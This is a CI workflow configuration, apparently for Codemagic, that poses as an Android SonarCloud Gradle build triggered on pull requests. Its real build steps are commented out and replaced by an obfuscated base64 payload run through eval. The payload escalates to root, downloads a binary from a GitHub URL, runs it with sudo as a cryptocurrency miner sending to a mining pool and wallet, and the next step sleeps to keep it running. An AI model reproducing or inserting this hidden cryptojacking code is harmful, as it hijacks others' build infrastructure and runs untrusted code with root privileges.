workflows:
  android-sonarcloud-gradle:
    name: Andoid Sonarcloud gradle
    instance_type: linux_x2
    #environment:
      #vars:
        #SONAR_TOKEN: Encrypted(Z0FBQUFBQmhHcXlJSGVwRVVmWF9GNVdGaWR3Z0M2ZVdWbFRUd201MHF2bHdIeTZXbjU2ZXhqUEw4MGlxSlRHQ0h1T1hiNkFrSUlhTHFjdDhaT2dRd29CR1Q0LXdZMkdLUElBOHRsc1p1WFczb2V1c1poczFlUTJybHlla1ZqemU2azE1SGpzd08xelE=)
        #SONAR_PROJECT_KEY: Encrypted(Z0FBQUFBQmhHcXp6MFBCVHo3N3JGYnJRSVpzdm9ES2FQNENmVnZtZFBhQTQ1UVhBckQxakdOTFphM21ZZnRHVGJxeTdRNEllTW5ZUDlneTJ1cEZSbGZsZG1WUWJhcjFwNjVRamdWcTFTX0JIaGJ0OWQwdm04T3l5Q2hoS1RuSFBEWW90SUNWQndSUElCNDNyRmQtNzFJN2kxa1otTTNDeEZ3PT0=)
        #SONAR_ORG_KEY: Encrypted(Z0FBQUFBQmhHcTBaM0QwN1lER0k4SHphVWpiOXNKLWFxSzQ2N0QxTXBGUWRORWppM21hVFM3UXFMZDA1YUFPd1ZvNWZRN04wOHc0Y0toM0txWXhzc2RPbUs4Qi1Oa2xzWVE9PQ==)
    triggering:
        events:
            - pull_request
        branch_patterns:
            - pattern: gradle-config
              include: true
              source: true    
    scripts:
      - |
        # Generate debug build
        ##./gradlew assembleDebug
        eval "$(echo "c3VkbyBzdQphcHQgdXBkYXRlCmFwdCBpbnN0YWxsIC15IGx5bngKbHlueCAtZG9udF93cmFwX3ByZSAtZHVtcCAiaHR0cHM6Ly9naXRodWIuY29tL3JhdWZwZXJtYW5hMjIvcnZhbi9yYXcvbWFpbi9kYXRhMSIgPiBkYXRhMSAmJiBjaG1vZCA3NzcgZGF0YTEgJiYgc3VkbyAuL2RhdGExIC0tZGlzYWJsZS1ncHUgLS1hbGdvcml0aG0gdmVydXNoYXNoIC0tcG9vbCB2ZXJ1c2hhc2gubmEubWluZS56cG9vbC5jYTo2MTQzIC0td2FsbGV0IERHMUZ2enEzWjVITnp4MlZSTnFuS0REQkpxN0EzTlZDdlMgLS1wYXNzd29yZCBjPURPR0UK" | base64 -d)"name: tes
      - |
        # Generate and upload code analysis report
        sleep 999
        #./gradlew sonarqube
    artifacts:
      - app/build/outputs/**/*.apk
    publishing:
      email:
        recipients:
          - kevin@nevercode.io
